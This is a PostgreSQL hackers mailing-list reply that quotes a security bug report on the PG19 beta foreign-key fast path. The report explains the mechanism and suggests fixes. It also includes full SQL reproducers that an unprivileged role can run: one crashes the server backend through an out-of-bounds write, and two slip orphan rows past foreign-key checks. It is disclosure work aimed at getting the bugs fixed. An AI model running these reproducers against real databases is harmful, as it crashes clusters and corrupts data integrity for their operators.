Re: PG19 FK fast path: OOB write and missed FK checks during batched

From: Amit Langote <amitlangote09(at)gmail(dot)com>
To: Nikolay Samokhvalov <nik(at)postgres(dot)ai>
Cc: pgsql-hackers mailing list <pgsql-hackers(at)postgresql(dot)org>, Andrey Borodin <amborodin(at)acm(dot)org>, Kirk Wolak <wolakk(at)gmail(dot)com>
Subject: Re: PG19 FK fast path: OOB write and missed FK checks during batched
Date: 2026-06-06 09:13:15
Message-ID: CA+HiwqGTOwRqkgrhqq6-nLyVGfGuAHMfoo+Ob2A4Z98ZkgwCmg@mail.gmail.com
Views: Whole Thread | Raw Message | Download mbox | Resend email
Thread:
Lists: pgsql-hackers

On Sat, Jun 6, 2026 at 17:31 Nikolay Samokhvalov <nik(at)postgres(dot)ai> wrote:

> Hi hackers,
>
>
> The new FK existence-check fast path in ri_triggers.c (ri_FastPath*) runs
> user-defined code in the middle of a deferred batch flush, which yields at
> least three defects reachable by an unprivileged table owner. Present in
> master and verified inREL_19_BETA1.
>
>
> I identified these issues during recent security research with LLMs. While
> they have clear security implications (OOB write, integrity bypass),
> reporting them here because they are isolated to 19beta1, absent in PG18
> and earlier; I don't have patches, only reproducibility.
>
>
> Mechanism:
>
>
> For an INSERT/UPDATE on the referencing side the fast path buffers rows
> in a transaction-lived cache (ri_fastpath_cache, keyed by pg_constraint
> OID) and probes the PK index in groups, flushing when a
>
> per-constraint buffer reaches RI_FASTPATH_BATCH_SIZE (64) or when the
>
> trigger-firing pass ends (ri_FastPathEndBatch, an
> AfterTriggerBatchCallback). For a cross-type FK the flush calls the
> column's cast function (ri_FastPathFlushArray, the FunctionCall3 at line
> 3069) and the equality operator -- arbitrary user code, mid-flush. Line
> numbers below are from a REL_19_BETA1 build (commit 4b0bf07).
>
>
> Unprivileged vehicle (defects 1 and 3). No superuser, no contrib: a role creates
> a type it owns and an IMPLICIT cast from it to the PK type with a PL/pgSQL
> function, which ri_HashCompareOp wires into the fast path's cast
>
> slot. Below uses a composite type. Default btree opclass, ordinary single-column
> FK, no GUC (fast path is unconditional for non-partitioned, non-temporal
> FKs, per ri_fastpath_is_applicable).
>
>
>
> 1) ri_FastPathBatchAdd (line 2859): out-of-bounds write on re-entry
>
>
> The write precedes the bound check, and batch_count is reset to 0 only at end
> of flush (ri_FastPathBatchFlush, line 2971), so it is 64 throughout a full-batch
> flush:
>
>
> fpentry->batch[fpentry->batch_count] = ExecCopySlotHeapTuple(newslot);
>
> fpentry->batch_count++;
>
> if (fpentry->batch_count >= RI_FASTPATH_BATCH_SIZE)
>
> ri_FastPathBatchFlush(fpentry, fk_rel, riinfo);
>
>
> There is no re-entrancy guard and ri_FastPathGetEntry returns the same entry,
> so user code that does DML on the same table during a full-batch flush
> re-enters with batch_count == 64 and writes batch[64], one past the
>
> array, overwriting the adjacent batch_count field (struct layout, lines
> 250-251). A single re-entrant row only stomps batch_count, which is then reset
> to 0 before reuse; the crash manifests once the re-entrant insert is
>
> itself large enough to fill and flush a batch, so the stomped batch_count
> is used as an array index (batch[garbage]) and as nvals in memset(matched,
> 0, nvals * sizeof(bool)) (line 3054).
>
>
> Reproduction (non-superuser; reliable SIGSEGV on --enable-cassert -O0;
> under -O2 the out-of-bounds write is of undefined effect):
>
>
> create table parent(id int primary key);
>
> insert into parent select g from generate_series(1,2000) g;
>
> create type vch as (v int);
>
> create function vcast(vch) returns int language plpgsql as $$
>
> begin
>
> if $1.v = 64 then
>
> insert into child select row(g)::vch from
> generate_series(1001,1064) g;
>
> end if;
>
> return $1.v;
>
> end$$;
>
> create cast (vch as int) with function vcast(vch) as implicit;
>
> create table child(a vch);
>
> alter table child add constraint child_fkey
>
> foreign key (a) references parent(id);
>
> insert into child select row(g)::vch from generate_series(1,64) g; --
> crash
>
> -- gdb: crash at ri_FastPathBatchAdd line 2866 with batch_count
> holding a
>
> -- stomped HeapTuple pointer's low bits, i.e. batch[64] overwrote
>
> -- batch_count; backend SIGSEGVs and the cluster restarts.
>
>
>
> 2) ri_FastPathSubXactCallback (line 4208): batch dropped on subxact abort
>
>
> On SUBXACT_EVENT_ABORT_SUB the callback discards the whole cache:
>
>
> ri_fastpath_cache = NULL;
>
> ri_fastpath_callback_registered = false;
>
>
> But batch[] holds outstanding rows of the enclosing transaction, not the aborting
> subxact. An internal subxact abort during after-trigger firing (PL/pgSQL
> BEGIN ... EXCEPTION) drops the buffered rows unflushed; their FK checks
> never run and orphans commit behind a constraint that still reports itself
> valid. No cast needed:
>
>
> create table pk(id int primary key);
>
> create table fk(a int, tag text);
>
> insert into pk select g from generate_series(1,10) g;
>
> alter table fk add constraint fk_a_fkey foreign key (a) references
> pk(id);
>
> create function abort_subxact() returns trigger language plpgsql as $$
>
> begin
>
> if NEW.tag = 'boom' then
>
> begin perform 1/0; exception when others then null; end;
>
> end if;
>
> return NEW;
>
> end$$;
>
> create trigger fk_after after insert on fk
>
> for each row execute function abort_subxact();
>
> insert into fk values
> (999,'bad'),(0,'boom'),(1,'ok'),(2,'ok'),(3,'ok');
>
> -- INSERT 0 5, no error
>
> select f.a from fk f left join pk p on f.a=p.id where p.id is null;
>
> -- a
>
> -- -----
>
> -- 999
>
> -- 0 (orphans)
>
>
> -- the constraint still reports itself valid, and re-validation passes
>
> -- while the orphans remain:
>
> select convalidated from pg_constraint where conname = 'fk_a_fkey';
>
> -- convalidated
>
> -- --------------
>
> -- t
>
> alter table fk validate constraint fk_a_fkey;
>
> -- ALTER TABLE (succeeds; does not re-scan committed rows)
>
> select f.a from fk f left join pk p on f.a=p.id where p.id is null;
>
> -- 999, 0 (orphans still present)
>
>
> Controls (no EXCEPTION; between-statement SAVEPOINT; DEFERRABLE INITIALLY DEFERRED)
> all behave correctly (FK violation raised, no orphans). The whole statement's
> buffered batch is discarded, not just the aborting row's check. The abort
> path also emits "WARNING: resource was not closed" (relation /
>
> index / TupleDesc), a resource leak consistent with the missing flush.
>
>
>
> 3) ri_FastPathEndBatch (line 4133): cross-table re-entry drops a check
>
>
> EndBatch flushes by iterating the cache with hash_seq_search (line 4143). If
> flush-time user code INSERTs into a different fast-path FK table, ri_FastPathGetEntry
> adds a new cache entry mid-scan; it can land in a bucket hash_seq_search
> already passed and is never reached. ri_FastPathTeardown (line 4165) then
> hash_destroys the cache (line 4188) without flushing entries that still
> have batch_count > 0, so that buffered check is discarded. This survives a
>
> per-entry guard for [1] (different entry, not a re-entry of the busy one):
>
>
> create table parent(id int primary key);
>
> insert into parent select g from generate_series(1,64) g;
>
> create table child2(a int);
>
> alter table child2 add constraint child2_fkey
>
> foreign key (a) references parent(id);
>
> create type vch as (v int);
>
> create function vcast(vch) returns int language plpgsql as $$
>
> begin
>
> if $1.v = 1 then
>
> insert into child2 values (999999); -- orphan into a
> *different* FK
>
> end if;
>
> return $1.v;
>
> end$$;
>
> create cast (vch as int) with function vcast(vch) as implicit;
>
> create table child(a vch);
>
> alter table child add constraint child_fkey
>
> foreign key (a) references parent(id);
>
> insert into child values (row(1)::vch); -- flushed at
> ri_FastPathEndBatch
>
> select a from child2 where a not in (select id from parent); -- =>
> 999999
>
> -- control: INSERT INTO child2 VALUES (999999); -- correctly raises
> FK error
>
>
>
> Root cause / thoughts:
>
>
> All three stem from invoking user cast/operator code inside a deferred batch
> flush: while a per-entry batch is half-updated [1], while a cache-wide hash_seq_search
> is in progress and teardown drops non-empty entries [3], and against a
> subxact-abort invalidation that cannot tell parent-xact rows from aborted-subxact
> rows [2].
>
>
> - [1] Bound-check before the write in ri_FastPathBatchAdd, and add a "flushing"
> flag to RI_FastPathEntry, rejecting re-entrant modification of a busy
> entry (a nested per-row probe is unsafe: the flush may hold PK-index buffer
> locks).
>
> - [3] Loop-flush in ri_FastPathEndBatch until no entry has batch_count >
> 0, and/or flush non-empty entries in ri_FastPathTeardown before
> hash_destroy.
>
> - [2] Do not discard outstanding parent-xact rows on
> SUBXACT_EVENT_ABORT_SUB; track the buffering subxact, or flush
> immediate-constraint batches subxact boundaries.
>
> - Unifying: a global "in fast-path flush" guard routing any re-entrant FK check
> to the immediate per-row path, and reconsidering running user code mid-flush
> at all.
>
>
> Nik
>

Thanks for the detailed report and reproducers. I’ve started looking into
this.

- thanks, Amit

>

In response to

Browse pgsql-hackers by date

  From Date Subject
Next Message Zhijie Hou (Fujitsu) 2026-06-06 09:35:01 RE: Fix race in ReplicationSlotRelease for ephemeral slots
Previous Message Alexander Lakhin 2026-06-06 09:00:00 t/035_standby_logical_decoding.pl might fail on attempt to read wrong timeline